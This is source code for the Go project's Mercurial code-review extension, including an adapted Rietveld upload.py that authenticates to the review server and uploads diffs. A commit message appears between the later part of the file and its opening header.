raise util.Abort("codereview extension enabled; use mail, upload, or submit instead of commit")
def nobackout(*pats, **opts):
"""(disabled when using this extension)"""
raise util.Abort("codereview extension enabled; use undo instead of backout")
def norollback(*pats, **opts):
"""(disabled when using this extension)"""
raise util.Abort("codereview extension enabled; use undo instead of rollback")
def RietveldSetup(ui, repo):
global defaultcc, upload_options, rpc, server, server_url_base, force_google_account, verbosity, contributors
global missing_codereview
repo_config_path = ''
# Read repository-specific options from lib/codereview/codereview.cfg
try:
repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
f = open(repo_config_path)
for line in f:
if line.startswith('defaultcc: '):
defaultcc = SplitCommaSpace(line[10:])
except:
# If there are no options, chances are good this is not
# a code review repository; stop now before we foul
# things up even worse. Might also be that repo doesn't
# even have a root. See issue 959.
if repo_config_path == '':
missing_codereview = 'codereview disabled: repository has no root'
else:
missing_codereview = 'codereview disabled: cannot open ' + repo_config_path
return
# Should only modify repository with hg submit.
# Disable the built-in Mercurial commands that might
# trip things up.
cmdutil.commit = nocommit
global real_rollback
real_rollback = repo.rollback
repo.rollback = norollback
# would install nobackout if we could; oh well
try:
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
for line in f:
# CONTRIBUTORS is a list of lines like:
# Person <email>
# Person <email> <alt-email>
# The first email address is the one used in commit logs.
if line.startswith('#'):
continue
m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
if m:
name = m.group(1)
email = m.group(2)[1:-1]
contributors[email.lower()] = (name, email)
for extra in m.group(3).split():
contributors[extra[1:-1].lower()] = (name, email)
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
server_url_base = "http://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = None
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
global releaseBranch
tags = repo.branchtags().keys()
if 'release-branch.r100' in tags:
# NOTE(rsc): This tags.sort is going to get the wrong
# answer when comparing release-branch.r99 with
# release-branch.r100. If we do ten releases a year
# that gives us 4 years before we have to worry about this.
raise util.Abort('tags.sort needs to be fixed for release-branch.r100')
tags.sort()
for t in tags:
if t.startswith('release-branch.'):
releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
'application/javascript',
'application/x-javascript',
'application/x-freemind'
]
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, "The user's access to the service has been disabled."
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Disable status prints so they don't obscure the password prompt.
global global_status
st = global_status
global_status = None
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
# Put status back.
global_status = st
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
typecheck(key, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
lines.append(value)
for (key, filename, value) in files:
typecheck(key, str)
typecheck(filename, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True, env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines, env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output, universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = filename.strip().replace('\\', '/')
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
set_status("uploading " + filename)
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [
("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
response_body = rpc_server.Send(url, body, content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
# Don't want to spawn too many threads, nor do we want to
# hit Rietveld too hard, or it will start serving 500 errors.
# When 8 works, it's no better than 4, and sometimes 8 is
# too many for Rietveld to handle.
MAX_PARALLEL_UPLOADS = 4
sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
upload_threads = []
finished_upload_threads = []
class UploadFileThread(threading.Thread):
def __init__(self, args):
threading.Thread.__init__(self)
self.args = args
def run(self):
UploadFile(*self.args)
finished_upload_threads.append(self)
sema.release()
def StartUploadFile(*args):
sema.acquire()
while len(finished_upload_threads) > 0:
t = finished_upload_threads.pop()
upload_threads.remove(t)
t.join()
t = UploadFileThread(args)
upload_threads.append(t)
t.start()
def WaitForUploads():
for t in upload_threads:
t.join()
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
StartUploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
StartUploadFile(filename, file_id, new_content, is_binary, status, False)
WaitForUploads()
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class FakeMercurialUI(object):
def __init__(self):
self.quiet = True
self.output = ''
def write(self, *args, **opts):
self.output += ' '.join(args)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, ui, repo):
super(MercurialVCS, self).__init__(options)
self.ui = ui
self.repo = repo
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo.root)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
if not err and mqparent != "":
self.base_rev = mqparent
else:
self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def GetBaseFile(self, filename):
set_status("inspecting " + filename)
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
# "hg status -C" returns two lines for moved/copied files, one otherwise
if use_hg_shell:
out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
else:
fui = FakeMercurialUI()
ret = commands.status(fui, self.repo, *[relpath], **{'rev': [self.base_rev], 'copies': True})
if ret:
raise util.Abort(ret)
out = fui.output
out = out.splitlines()
# HACK: strip error message about missing file/directory if it isn't in
# the working copy
if out[0].startswith('%s: ' % relpath):
out = out[1:]
status, what = out[0].split(' ', 1)
if len(out) > 1 and status == "A" and what == relpath:
oldrelpath = out[1].strip()
status = "M"
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
if use_hg_shell:
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
else:
base_content = str(self.repo[base_rev][oldrelpath].data())
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content and use_hg_shell:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = temp_filename.strip().replace('\\', '/')
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
set_status("uploading patch for " + patch[0])
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
codereview: fix for Mercurial 1.9
R=golang-dev, mirtchovski, mikioh.mikioh
CC=golang-dev
http://codereview.appspot.com/4686049
Committer: Russ Cox <5ad239cb8a44f659eaaee0aa1ea5b94947abe557@golang.org>
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re, time
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
# The standard 'json' package is new in Python 2.6.
# Before that it was an external package named simplejson.
try:
# Standard location in 2.6 and beyond.
import json
except Exception, e:
try:
# Conventional name for earlier package.
import simplejson as json
except:
try:
# Was also bundled with django, which is commonly installed.
from django.utils import simplejson as json
except:
# We give up.
raise e
try:
hgversion = util.version()
except:
from mercurial.version import version as v
hgversion = v.get_version()
try:
from mercurial.discovery import findcommonincoming
except:
def findcommonincoming(repo, remote):
return repo.findcommonincoming(remote)
# in Mercurial 1.9 the cmdutil.match and cmdutil.revpair moved to scmutil
if hgversion >= '1.9':
from mercurial import scmutil
else:
scmutil = cmdutil
oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""
linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < '1.3':
msg = oldMessage
if os.access("/etc/mercurial", 0):
msg += linuxMessage
raise util.Abort(msg)
def promptyesno(ui, msg):
# Arguments to ui.prompt changed between 1.3 and 1.3.1.
# Even so, some 1.3.1 distributions seem to have the old prompt!?!?
# What a terrible way to maintain software.
try:
return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
except AttributeError:
return ui.prompt(msg, ["&yes", "&no"], "y") != "n"
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
server = "codereview.appspot.com"
server_url_base = None
defaultcc = None
contributors = {}
missing_codereview = None
real_rollback = None
releaseBranch = None
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
if type(s) != t:
raise util.Abort("type check failed: %s has type %s != %s" % (repr(s), type(s), t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
typecheck(s, str)
return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
from mercurial import encoding
encoding.encoding = 'utf-8'
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
import sys
reload(sys) # site.py deleted setdefaultencoding; get it back
sys.setdefaultencoding('utf-8')
default_to_utf8()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
